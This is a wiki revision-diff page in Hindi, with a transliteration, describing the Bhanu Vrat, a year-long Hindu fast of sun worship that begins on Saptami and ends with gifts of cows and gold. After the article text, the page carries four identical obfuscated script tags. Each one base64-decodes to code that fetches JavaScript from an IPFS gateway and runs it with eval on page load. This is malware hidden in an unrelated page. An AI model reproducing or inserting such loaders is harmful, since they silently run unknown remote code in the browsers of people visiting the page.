Difference between revisions of "भानु व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*'[[सप्तमी]] को यह व्रत आरम्भ किया जाता है।  
 
*'[[सप्तमी]] को यह व्रत आरम्भ किया जाता है।  
 
*उस दिन नक्त विधि; [[देवता]], [[सूर्य देवता|सूर्य]] कू पूजा करते हैं।  
 
*उस दिन नक्त विधि; [[देवता]], [[सूर्य देवता|सूर्य]] कू पूजा करते हैं।  
 
*यह पूजा एक [[वर्ष]] तक होती है।  
 
*यह पूजा एक [[वर्ष]] तक होती है।  
 
*अन्त में गो एवं सोने का दान किया जाता है।  
 
*अन्त में गो एवं सोने का दान किया जाता है।  
*ऐसी मान्यता है कि इसे करने से सूर्यलोक की प्राप्ति होती है।<ref>कृत्यकल्पतरु (448, मत्स्यपुराण 10160 से उद्धरण)</ref>;<ref> हेमाद्रि (1, 786, पद्मपुराण से उद्धरण)</ref>
+
*ऐसी मान्यता है कि इसे करने से सूर्यलोक की प्राप्ति होती है।<ref>कृत्यकल्पतरु (448, मत्स्यपुराण 10160 से उद्धरण</ref>;<ref> हेमाद्रि (1, 786, पद्मपुराण से उद्धरण</ref>
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:55, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • 'saptami ko yah vrat arambh kiya jata hai.
  • us din nakt vidhi; devata, soory koo pooja karate haian.
  • yah pooja ek varsh tak hoti hai.
  • ant mean go evan sone ka dan kiya jata hai.
  • aisi manyata hai ki ise karane se sooryalok ki prapti hoti hai.[1];[2]


tika tippani aur sandarbh

  1. krityakalpataru (448, matsyapuran 10160 se uddharan
  2. hemadri (1, 786, padmapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>